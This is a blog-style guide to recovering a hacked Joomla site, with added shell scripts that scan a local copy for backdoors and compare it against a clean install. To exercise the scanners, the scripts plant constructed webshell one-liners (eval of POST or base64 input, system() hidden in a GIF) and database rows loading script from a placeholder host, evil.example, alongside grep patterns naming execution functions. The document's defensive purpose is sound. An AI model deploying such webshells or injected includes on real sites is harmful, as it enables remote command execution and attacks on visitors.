I’ve recently had to help someone still running Joomla to clean up a hacked site. We are not sure how it happened, as they generally applied updates pretty quickly, but luckily it was detected very quickly and brought down to be fixed.
If your site is hacked, take it offline immediately. The clean-up need not take long, and if a search engine detects the problem first you will be dropped from its results until it is fixed, and you will then have to get re-listed once the compromised pages are gone.
This is also for the greater good: hacked pages are often loaded with dangerous payloads that serve malware to your visitors, and I'm pretty sure that's not your intention.
At the end of the day, it only takes one issue being found in any one of the installed products, and until that issue is fixed there is a vector into the system. We decided to move over 90% of our site's functions to Hugo, a static site generator, as there are far fewer moving parts.
One of the problems with a modern compromise is that it can be difficult to detect: the attackers do not want you to know they have been there, so rather than defacing the site they leave as little trace as possible. Restoring from a backup that predates the compromise would obviously be the best solution, but it is only an option if the backup itself is clean, and given the above that may not be possible, depending on how long ago your site was compromised.
If a backup is not viable, you will have to "cleanse" the live version. I recommend taking a backup (SQL and files) of the live site and getting it running locally. Be careful about visiting the site in a browser, as a planted page could compromise your computer; if you really need to fetch a page for some reason, use the unix curl command instead, which downloads the content without rendering or executing it.
I'm not going to repeat the good information that's already available here: Help identifying a hacked site. After going through the instructions on that page you'll have a good idea whether your site is hacked, and probably know the affected files as well. If your site has been hacked, check the database too; any problems there will also need manual attention.
Also take a look at the Joomla forum post assistant.
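As an added example (not part of the original post, and not code from Joomla or the guides linked above), here is a first-pass scan of the local copy of the webroot for the indicators those guides tell you to look for: PHP files using the obfuscation and execution primitives that webshells rely on, PHP open tags inside files that should not contain PHP (images, cached data), and files modified after a last-known-clean date. The sample webroot it builds under a temp directory is constructed for the demo; run the three functions against your own copy instead.

```shell
#!/bin/sh
# Added example: triage a local copy of a Joomla webroot. Everything under
# make_sample_webroot() is constructed demo data, not a real site.

make_sample_webroot() {
  root=$(mktemp -d)
  mkdir -p "$root/images" "$root/administrator/components/com_demo" "$root/cache"
  # a legitimate-looking component file (constructed)
  printf '<?php\n// component entry point\necho "hello";\n' \
    > "$root/administrator/components/com_demo/demo.php"
  # classic dropped backdoor: eval() of a base64 blob, hidden as a dotfile
  printf '<?php eval(base64_decode("cGhwaW5mbygpOw=="));\n' > "$root/cache/.sess_x.php"
  # PHP hidden behind a GIF header in the images directory
  printf 'GIF89a<?php system($_GET["c"]); ?>\n' > "$root/images/logo.gif"
  printf 'GIF89a real image bytes\n' > "$root/images/real.gif"
  # legitimate files predate the last known-clean date; the planted ones are recent
  touch -t 202001010000 "$root/administrator/components/com_demo/demo.php" "$root/images/real.gif"
  printf '%s\n' "$root"
}

# PHP files that call the obfuscation/execution primitives webshells lean on.
# Legitimate extensions use some of these too, so hits are review candidates,
# not verdicts; compare each against the clean install before deleting.
find_suspicious_php() {
  find "$1" -type f -name '*.php' -exec grep -lE \
    'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|create_function\(|shell_exec\(|passthru\(' \
    {} + 2>/dev/null | sort
}

# Files that are not .php but contain a PHP open tag: uploads, images and
# cache directories are favourite hiding places.
find_php_in_nonphp() {
  find "$1" -type f ! -name '*.php' -exec grep -l '<?php' {} + 2>/dev/null | sort
}

# Files modified after a timestamp (YYYYMMDDhhmm), e.g. your last trusted
# backup. Attackers often reset mtimes, so no hits proves nothing, but a hit
# in a directory that should be static is worth a look.
find_changed_since() {
  ref=$(mktemp)
  touch -t "$2" "$ref"
  find "$1" -type f -newer "$ref" | sort
  rm -f "$ref"
}

# Demo run against the constructed webroot
SITE=$(make_sample_webroot)
echo "== PHP files using webshell primitives"; find_suspicious_php "$SITE"
echo "== PHP code in non-PHP files";           find_php_in_nonphp "$SITE"
echo "== Files changed since 2023-01-01";      find_changed_since "$SITE" 202301010000
```

On a real copy, point the functions at the root of the extracted backup and feed `find_changed_since` the date of your last trusted backup; anything it lists under `libraries/`, `administrator/` or `components/` that is not explained by an update you performed is a candidate for the side-by-side compare later on.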
There's no shortcut here I'm afraid: the only way to cleanse all the files is to start with a clean Joomla install of the same version and compare the directories side by side. I normally use Beyond Compare by Scooter Software, as it has a really good directory compare tool built in.
If you were not running the latest version of Joomla, upgrade the locally running hacked installation to the latest version. Do the upgrade manually as documented on the Joomla site, and do not visit any pages of the site while doing so.
Now install clean versions of the plugins into the clean installation; again, if your plugins were out of date, bring them up to date in the hacked site first so that both sides of the compare are at the same version.
Start the directory compare; as the Joomla versions are the same, the comparison should be quite straightforward. If you are using Beyond Compare, set it to show only folders that have differences. Move files into the new installation only once you know they have not been hacked or compromised. Once complete, run a virus checker on the site.
Now correct any issues in the database as per the post above; the attackers may well have gained access and compromised that too. It may be easier to fix the SQL export you took when making the backup, as you can search for the same terms as before directly in the SQL export file.
At this point you should be able to replace your hacked version with the newly created site. First test it locally or on a test domain to ensure it's working properly; then entirely remove the current production version and copy over the new one.
Read on for how to reduce the chances of it happening again. It's worth going through your security measures and making sure they are enough. Here are a few questions for starters:
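The compare and database steps above, as an added example that is not code from the original post, Joomla or Beyond Compare: a shell version of the side-by-side compare, listing files that exist only in the hacked copy (your own content or a dropped backdoor, each needing a decision) and files present in both trees whose contents differ (a modified core file), followed by a grep over the SQL export for injected markup. The two trees and the dump it builds are constructed demo data, and the evil.example host is a placeholder.

```shell
#!/bin/sh
# Added example: compare a clean Joomla tree against the hacked copy and scan
# the SQL export. make_sample_trees() builds constructed demo data only.

make_sample_trees() {
  base=$(mktemp -d)
  clean="$base/clean"; hacked="$base/hacked"
  mkdir -p "$clean/libraries" "$hacked/libraries" "$hacked/images" "$hacked/tmp"
  # core file, identical in both trees
  printf '<?php // core loader\n' > "$clean/libraries/loader.php"
  printf '<?php // core loader\n' > "$hacked/libraries/loader.php"
  # core file that the attacker modified to pull in a dropped payload
  printf '<?php // front controller\n' > "$clean/index.php"
  printf '<?php // front controller\n@include "/tmp/.x";\n' > "$hacked/index.php"
  # only in the hacked copy: one legitimate upload, one dropped backdoor
  printf 'GIF89a site banner\n' > "$hacked/images/banner.gif"
  printf '<?php eval($_POST["x"]);\n' > "$hacked/tmp/upd.php"
  # SQL export with two content rows carrying injected markup (constructed)
  cat > "$base/dump.sql" <<'EOF'
INSERT INTO `jos_content` VALUES (1,'Welcome','<p>Hello</p>');
INSERT INTO `jos_content` VALUES (2,'About','<p>About us</p><script src="http://evil.example/a.js"></script>');
INSERT INTO `jos_content` VALUES (3,'Team','<p>Team</p><iframe src="http://evil.example/i" width="0" height="0"></iframe>');
EOF
  printf '%s\n' "$base"
}

# Relative paths of all regular files under a tree, sorted for comm(1).
list_files() { ( cd "$1" && find . -type f | sed 's|^\./||' | sort ); }

# Files present in the hacked copy but absent from the clean install: either
# your own site content (configuration.php, templates, uploads) or something
# the attacker dropped. Every entry needs a decision before it is moved over.
only_in_hacked() {
  a=$(mktemp); b=$(mktemp)
  list_files "$1" > "$a"; list_files "$2" > "$b"
  comm -13 "$a" "$b"
  rm -f "$a" "$b"
}

# Files present in both trees whose contents differ: a shipped file that was
# edited in place. Core files should never appear here after an update.
differing_files() {
  list_files "$1" | while IFS= read -r f; do
    if [ -f "$2/$f" ]; then
      cmp -s "$1/$f" "$2/$f" || printf '%s\n' "$f"
    fi
  done | sort
}

# Injected markup in content rows: remote script includes, hidden iframes and
# the usual JavaScript de-obfuscation calls. Extend the pattern with whatever
# the file scan turned up.
scan_sql_dump() {
  grep -nEi '<script[^>]*src=|<iframe|document\.write\(unescape\(|String\.fromCharCode\(' "$1" | sort
}

# Demo run against the constructed trees
SITE=$(make_sample_trees)
echo "== only in hacked copy";      only_in_hacked "$SITE/clean" "$SITE/hacked"
echo "== present in both, differ";  differing_files "$SITE/clean" "$SITE/hacked"
echo "== suspicious SQL rows";      scan_sql_dump "$SITE/dump.sql"
```

Run `only_in_hacked` and `differing_files` with the fresh install (plus freshly installed plugins) as the first argument and the upgraded hacked copy as the second; the "only in hacked" list is what you have to triage by hand, and the "differ" list should be empty for anything shipped by Joomla or a plugin. The line numbers printed by `scan_sql_dump` take you straight to the rows to edit in the export before you import it.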
If you continue to use Joomla, take a look at the Joomla security page.